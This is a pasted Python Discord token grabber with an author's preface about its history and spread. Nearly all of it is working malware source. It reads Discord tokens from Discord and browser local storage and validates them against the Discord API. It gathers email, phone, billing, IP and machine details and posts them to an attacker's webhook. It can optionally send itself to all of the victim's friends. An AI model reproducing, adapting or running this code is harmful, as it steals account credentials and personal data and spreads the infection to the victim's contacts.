dTGPG payload (Python) [ORIGINAL]

1. # Token grabber (Python payload) generated using dTGPG by checksum (@0DAYBROKER on Twitter)
2.  
3. """
4. This piece of shit code developed/generated by me was first published in start 2020 and has since then been widely used by script kiddies on the internet.
5.  
6. Right before I took down the Pastebin containing my developer credits in early 2021, it had been GET'd +200.000 times, which is most likely to be the amount of times this specific script has been executed! I feel bad about it...
7.  
8. In late 2019, I was bored and decided to write a tool named dTGPG (Discord Token Grabber Payload Generator) written in Python - just for fun and not for malicious purposes. The tool was capable of generating the same customizable Discord token grabber payload in various of different languages.
9.  
10. This specific payload that every other script kiddie is using is quite old, outdated and slightly modified by the leaker. Later versions of the payload, had options to attach itself to the Discord application, delete itself after execution and would search in all user directories and other drives for tokens.
11.  
12. The script was first getting popular, when a small YouTube channel named Dr. Teilaw promoted it back in ~May 2020. Right before his video got taken down, it had gotten +50.000 views.
13.  
14. dTGPG was never released publicly, which is why only the Python payload, which was leaked, is actively used.
15.  
16. Payload command-line options:
17. - Language              : The language the payload should be generated in.
18. - Webhook URL           : Threat actors Discord webhook URL.
19. - Self spread           : Spread the malware to all friends of the victim.
20. - Self spread message   : Message sent above the attached malware - e.g. "Check this out! :o".
21. - Self spread file name : Malware file name when it's sent in DM's.
22. - Self spread delay     : Delay between each message.
23. - Obfuscation           : Obfuscates the payload for the specified language.
24. - Ping on hit           : Mentions/pings @everyone in the channel where the tokens are sent to.
25. - Prevent spam          : Caches all tokens locally on the victim's machine, so if the victim re-executes the malware, it will only new working tokens, if they are not already cached.
26. - Embed color           : Embed color
27. - Webhook username      : Webhook username
28. - Webhook avatar        : Webhook avatar
29.  
30. Supported languages:
31. - Batch
32. - Ruby
33. - Go
34. - PowerShell
35. - Python
36. - NodeJS / JavaScript
37. - VisualBasic Script
38. """
39.  
40. import os
41.  
42. if os.name != 'nt':
43.     exit()
44.  
45. from re import findall
46. from json import loads, dumps
47. from base64 import b64decode
48. from subprocess import Popen, PIPE
49. from urllib.request import Request, urlopen
50. from datetime import datetime
51. from threading import Thread
52. from time import sleep
53. from sys import argv
54.  
55. LOCAL = os.getenv('LOCALAPPDATA')
56. ROAMING = os.getenv('APPDATA')
57. PATHS = {
58.     'Discord'           : ROAMING + '\\Discord',
59.     'Discord Canary'    : ROAMING + '\\DiscordCanary',
60.     'Discord PTB'       : ROAMING + '\\DiscordPTB',
61.     'Google Chrome'     : LOCAL + '\\Google\\Chrome\\User Data\\Default',
62.     'Opera'             : ROAMING + '\\Opera Software\\Opera Stable',
63.     'Brave'             : LOCAL + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
64.     'Yandex'            : LOCAL + '\\Yandex\\YandexBrowser\\User Data\\Default'
65. }
66.  
67. def get_headers(token=None, content_type='application/json'):
68.     headers = {
69.         'Content-Type': content_type,
70.         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
71.     }
72.     if token:
73.         headers.update({'Authorization': token})
74.     return headers
75.  
76. def get_user_data(token):
77.     try:
78.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me', headers=get_headers(token))).read().decode())
79.     except:
80.         pass
81.  
82. def get_tokens(path):
83.     path += '\\Local Storage\\leveldb'
84.     tokens = []
85.     for file_name in os.listdir(path):
86.         if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
87.             continue
88.         for line in (x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()):
89.             for token in findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', line):
90.                 tokens.append(token)
91.     return tokens
92.  
93. def get_developer():
94.     dev = 'checksum'
95.     try:
96.         dev = urlopen(Request('https://pastebin.com/raw/ssFxiejv')).read().decode()
97.     except:
98.         pass
99.     return dev
100.  
101. def get_ip():
102.     ip = 'None'
103.     try:
104.         ip = urlopen(Request('https://api.ipify.org')).read().decode().strip()
105.     except:
106.         pass
107.     return ip
108.  
109. def get_avatar(uid, aid):
110.     url = f'https://cdn.discordapp.com/avatars/{uid}/{aid}.gif'
111.     try:
112.         urlopen(Request(url))
113.     except:
114.         url = url[:-4]
115.     return url
116.  
117. def get_hwid():
118.     """ Deprecated """
119.     p = Popen('wmic csproduct get uuid', shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
120.     return (p.stdout.read() + p.stderr.read()).decode().split('\n')[1]
121.  
122. def get_friends(token):
123.     try:
124.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/relationships', headers=get_headers(token))).read().decode())
125.     except:
126.         pass
127.  
128. def get_chat(token, uid):
129.     try:
130.         return loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/channels', headers=get_headers(token), data=dumps({'recipient_id': uid}).encode())).read().decode())['id']
131.     except:
132.         pass
133.  
134. def has_payment_methods(token):
135.     try:
136.         return len(loads(urlopen(Request('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers=get_headers(token))).read().decode())) > 0
137.     except:
138.         pass
139.  
140. def send_message(token, chat_id, form_data):
141.     try:
142.         urlopen(Request(f'https://discordapp.com/api/v6/channels/{chat_id}/messages', headers=get_headers(token, 'multipart/form-data; boundary=---------------------------325414537030329320151394843687'), data=form_data.encode())).read().decode()
143.     except:
144.         pass
145.  
146. def spread(token, form_data, delay):
147.     for friend in get_friends(token):
148.         try:
149.             chat_id = get_chat(token, friend['id'])
150.             send_message(token, chat_id, form_data)
151.         except:
152.             pass
153.         sleep(delay)
154.  
155. def main():
156.     # configuration part
157.     # this part was originally never in the script,
158.     # as the payload was generated through a tool I developed in late 2019,
159.     # which would directly change values where the values are used instead of
160.     # declaring variables to keep the code as short as possible, and add a little extra obfuscation.
161.     prevent_spam = True
162.     self_spread = False
163.     ping_on_hit = True
164.     webhook_url = 'https://discord.com/api/webhooks/.../...'
165.     self_spread_message = 'Check this out :open_mouth:'
166.     self_spread_file_name = 'exploit.py'
167.     self_spread_delay = 7500 / 1000
168.  
169.     ip = get_ip()
170.     pc_username = os.getenv('UserName')
171.     pc_name = os.getenv('COMPUTERNAME')
172.     developer = get_developer()
173.  
174.     cache_path = ROAMING + '\\.cache~$'
175.  
176.     already_cached_tokens = []
177.     if prevent_spam and os.path.exists(cache_path):
178.         with open(cache_path) as f:
179.             already_cached_tokens = [x.strip() for x in f.readlines() if x.strip()]
180.  
181.     embeds = []
182.     checked_tokens = already_cached_tokens.copy()
183.     working_tokens = []
184.     working_ids = []
185.  
186.     for platform, path in PATHS.items():
187.         if not os.path.exists(path):
188.             continue
189.  
190.         for token in get_tokens(path):
191.             if token in checked_tokens:
192.                 continue
193.  
194.             checked_tokens.append(token)
195.  
196.             uid = None
197.             if not token.startswith('mfa.'):
198.                 try:
199.                     uid = b64decode(token.split('.')[0].encode()).decode()
200.                 except:
201.                     pass
202.  
203.                 if not uid or uid in working_ids:
204.                     continue
205.  
206.             user_data = get_user_data(token)
207.  
208.             if not user_data:
209.                 continue
210.  
211.             working_ids.append(uid)
212.             working_tokens.append(token)
213.  
214.             username = user_data['username'] + '#' + str(user_data['discriminator'])
215.  
216.             user_id = user_data['id']
217.             avatar_id = user_data['avatar']
218.             avatar_url = get_avatar(user_id, avatar_id)
219.             email = user_data.get('email')
220.             phone = user_data.get('phone')
221.             nitro = bool(user_data.get('premium_type'))
222.             billing = has_payment_methods(token)
223.  
224.             embed = {
225.                 'color': 0x7289DA,
226.                 'fields': [
227.                     {
228.                         'name': '**Account Info**',
229.                         'value': f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
230.                         'inline': True
231.                     },
232.                     {
233.                         'name': '**PC Info**',
234.                         'value': f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
235.                         'inline': True
236.                     },
237.                     {
238.                         'name': '**Token**',
239.                         'value': token,
240.                         'inline': False
241.                     }
242.                 ],
243.                 'author': {
244.                     'name': f'{username} ({user_id})',
245.                     'icon_url': avatar_url
246.                 },
247.                 'footer': {
248.                     'text': f'Token grabber by {developer}'
249.                 }
250.             }
251.             embeds.append(embed)
252.  
253.     if prevent_spam:
254.         with open(cache_path, 'a') as f:
255.             for token in checked_tokens:
256.                 if not token in already_cached_tokens:
257.                     f.write(token + '\n')
258.  
259.     if len(working_tokens) == 0:
260.         return
261.  
262.     webhook = {
263.         'content': '@everyone' if ping_on_hit else '',
264.         'embeds': embeds,
265.         'username': 'Discord Token Grabber',
266.         'avatar_url': 'https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png'
267.     }
268.  
269.     try:
270.         urlopen(Request(webhook_url, data=dumps(webhook).encode(), headers=get_headers()))
271.     except:
272.         pass
273.  
274.     if self_spread:
275.         with open(argv[0], encoding='utf-8') as f:
276.             content = f.read()
277.  
278.         payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{self_spread_file_name}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\n{self_spread_message}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
279.  
280.         for token in working_tokens:
281.             Thread(target=spread, args=(token, payload, self_spread_delay)).start()
282.  
283. try:
284.     main()
285. except:
286.     pass
287.